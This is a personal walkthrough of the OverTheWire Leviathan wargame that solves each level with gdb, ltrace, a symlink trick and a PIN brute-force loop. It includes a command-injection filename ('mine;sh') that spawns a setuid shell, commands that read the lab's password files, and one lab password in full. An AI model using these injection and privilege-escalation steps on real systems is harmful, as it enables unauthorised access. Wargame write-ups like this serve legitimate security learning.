[Leviathan]

/!\ NOTE: This Writeup is kind of messed up. Take this as a kind of my mindlog, so things might be unclear.


[lvl0]

login: - ssh leviathan0@leviathan.labs.overthewire.org

grep password .backup/bookmarks.html
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>


[lvl01]

For this level to solve you have to start gdb and step through the assembly code until you find that lines (4-5) before that call to strcmp. the second parameter pushed to strcmp is our string which resolves this level:

=> 0x80485a7 <main+122>:        lea    eax,[esp+0x14]
   0x80485ab <main+126>:        mov    DWORD PTR [esp],eax
   0x80485ae <main+129>:        call   0x80483b0 <strcmp@plt>
   0x80485b3 <main+134>:        test   eax,eax
   0x80485b5 <main+136>:        jne    0x80485c5 <main+152>
   0x80485b7 <main+138>:        mov    DWORD PTR [esp],0x804868b
   0x80485be <main+145>:        call   0x8048400 <system@plt>
   0x80485c3 <main+150>:        jmp    0x80485d1 <main+164>
--------------------------------------------------------------------------------
0x080485a7 in main ()

gdb$ x /wx $eax
0xbfcb2ee8:     0x00786573
gdb$ x /s $eax
0xbfcb2ee8:      "s..."

as you can see 's..' is our searched password.

But at this point we still need the password to elevate to level2. So here we go:

   1 find / -user leviathan2 -group leviathan2 2>/dev/null
   2 /etc/leviathan_pass/leviathan2
   3 /var/crash/test; whoami
   4 /var/crash/date; date
   5 /var/crash/test; cd ..; cd ..; cd etc; cd leviathan_pass; cat leviathan3
   6 /var/crash/test
   7 /var/crash/test; cat \\etc
   8 /var/crash/test; cat

and the first entry from the find results is the file which contains the password:

$ cat /etc/leviathan_pass/leviathan2
ou......


[lvl02]

This is kind of simple

leviathan2@melinda:/tmp/myfilesfile$ ls
mine;sh  testfoo  testfoo0
leviathan2@melinda:/tmp/myfilesfile$ /home/leviathan2/printfile 'mine;sh'
/bin/cat: mine: No such file or directory
$ id
uid=12002(leviathan2) gid=12002(leviathan2) euid=12003(leviathan3) groups=12003(leviathan3),12002(leviathan2)
$ cat /etc/leviathan_pass/leviathan3
Ah.....
$

# The thing is you have to create a file which hase this odd name 'mine;sh'


[lvl03]

leviathan3@melinda:~$ ltrace ./level3
__libc_start_main(0x80485fe, 1, 0xffffd7b4, 0x80486d0 <unfinished ...>
strcmp("h0no33", "kakaka")                                                                             = -1
printf("Enter the password> ")                                                                         = 20
fgets(Enter the password> snlprintf
"snlprintf\n", 256, 0xf7fcac20)                                                                  = 0xffffd5ac
strcmp("snlprintf\n", "snlprintf\n")                                                                   = 0
puts("[You've got shell]!"[You've got shell]!
)                                                                            = 20
system("/bin/sh"$
$ cat /etc/leviathan_pass/leviathan4
vu........
$


[lvl04]

on remote host:

cd .trash 
ls 
bin
./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010

here we have to decode a binary string in .trash. This is a pythonic approach:

dirk@lazerbeam0: ~  $ python                                                                 [16:55:01]
Python 2.7.8 (default, Jul 30 2014, 12:11:15) 
[GCC 4.2.1 20070719 ] on openbsd5
Type "help", "copyright", "credits" or "license" for more information.
>>> n = int('0101010001101001011101000110100000110100011000110110111101101011011001010110100100001010', 
2)                                                                                                      
>>> import binascii
>>> binascii.unhexlify('%x' %n)
'Ti.......\n'
>>> 

this is our password to enter leviathan lvl05 (without the \n).


[lvl05]

-_-

leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@melinda:~$ ./leviathan5 
Ug......
leviathan5@melinda:~$ 


[lvl06]

for i in {0001..9999} ; do ./leviathan6 $i ; done
wait...
id
uid=12006(leviathan6) gid=12006(leviathan6) euid=12007(leviathan7) groups=12007(leviathan7),12006(leviathan6)
$ cat /etc/leviathan_pass/leviathan7
ah.....


[lvl07]

leviathan7@melinda:~$ ls
CONGRATULATIONS
leviathan7@melinda:~$ cat CONGRATULATIONS 
....
leviathan7@melinda:~$ 


exploitation

leviathan (zuletzt geändert am 2016-12-12 17:32:52 durch Dirk)